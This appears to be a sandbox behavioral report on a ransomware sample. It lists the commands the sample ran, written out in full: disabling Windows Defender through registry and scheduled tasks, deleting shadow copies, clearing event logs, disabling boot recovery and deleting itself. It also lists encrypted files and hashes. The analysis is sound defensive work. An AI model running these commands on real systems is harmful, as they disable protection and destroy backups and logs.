reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\C3QW_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/1520-53-0x000007FEFB711000-0x000007FEFB713000-memory.dmp
memory/2156-57-0x000007FEF2830000-0x000007FEF338D000-memory.dmp
memory/2156-58-0x000007FEF4F5E000-0x000007FEF4F5F000-memory.dmp
memory/2156-59-0x0000000002740000-0x0000000002742000-memory.dmp
memory/2156-60-0x0000000002742000-0x0000000002744000-memory.dmp
memory/2156-61-0x0000000002744000-0x0000000002747000-memory.dmp
memory/2156-62-0x000000000274B000-0x000000000276A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fc6f0fce37f30c1b1c5c052d76293933 |
| SHA1 | 081ab9812706f302785a646f6c32d91ca80f51f2 |
| SHA256 | dd2585ef3f97b7fff50f6bfec08c6e903c7fcaeb4432271f96ef19a510cf931d |
| SHA512 | ced814d8c8a8638f6f756a4229ed3156b9fe8bb476dd0f8202073337b4a35e7c55ff20756979822fe668515f00f654decc3264823ee49295cada1962e5c0ce9b |
memory/2248-65-0x000007FEF1E90000-0x000007FEF29ED000-memory.dmp
memory/2248-69-0x00000000024D4000-0x00000000024D7000-memory.dmp
memory/2248-68-0x00000000024D2000-0x00000000024D4000-memory.dmp
memory/2248-67-0x00000000024D0000-0x00000000024D2000-memory.dmp
memory/2248-70-0x00000000024DB000-0x00000000024FA000-memory.dmp
memory/2248-66-0x000007FEF45BE000-0x000007FEF45BF000-memory.dmp
C:\C3QW_HOW_TO_DECRYPT.txt
| MD5 | 1ae90b6777e6a8e5a50a140911c19659 |
| SHA1 | e690e81a7ce5f76377a656af06845478aadcbf29 |
| SHA256 | a2c864df5fa0462b3e732f525f84853d6c1ddde795fd2fa1f94826f527671519 |
| SHA512 | fb38906f464fbdd832b13bfcd4c10e84984d529cf5e09b05f2269e89b125d11a570eb0984db46a2beaeafea76ea071f07039092dbd6d9df6d595e91ea26e4da2 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-17 10:21
Reported
2022-02-17 10:23
Platform
win10v2004-en-20220112
Max time kernel
151s
Max time network
153s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\StartConvertFrom.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\HideJoin.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GAAAABgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RepairEnter.tif => C:\Users\Admin\Pictures\RepairEnter.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RepairEnter.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StartConvertFrom.tif => C:\Users\Admin\Pictures\StartConvertFrom.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ClearStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinStart.crw => C:\Users\Admin\Pictures\JoinStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GroupWatch.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\HideJoin.tif => C:\Users\Admin\Pictures\HideJoin.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GAAAABgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\JoinStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OpenCheckpoint.raw => C:\Users\Admin\Pictures\OpenCheckpoint.raw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KgAAACoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResetRead.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ClearStart.crw => C:\Users\Admin\Pictures\ClearStart.crw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GroupWatch.png => C:\Users\Admin\Pictures\GroupWatch.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OpenCheckpoint.raw.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KgAAACoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResetRead.tif => C:\Users\Admin\Pictures\ResetRead.tif.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GgAAABoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\Welcome_Slide01.jpg | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-white_scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyView.scale-125.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\32.jpg | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-150_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OAAAADgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\Attribution\accuweather.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-20.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main.css.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_IgAAACIAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\deploy\[email protected]_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostName.XSL.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KAAAACgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_EgAAABIAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Road.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_OgAAADoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sqlpdw.xsl.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_EAAAABAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-80.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\LargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LargeTile.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\excluded.txt.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_FgAAABYAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Grace-ppd.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_GAAAABgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\PREVIEW.GIF.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-white_devicefamily-colorfulunplated.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-pl.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_CgAAAAoAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART10.BDR.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\MediaInkCanvas.xbf | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-20_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\MedTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\CortanaApp.ViewElements\Assets\Settings-Black.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Fur.dxt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FileForms32x32.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.scale-100.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\VideoEditor.Common\Resources\SimpleProgressBarTheme.xbf | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-63.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptySearch.scale-150.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-40.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.scale-200.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons.png.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_EAAAABAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_FAAAABQAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W5.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
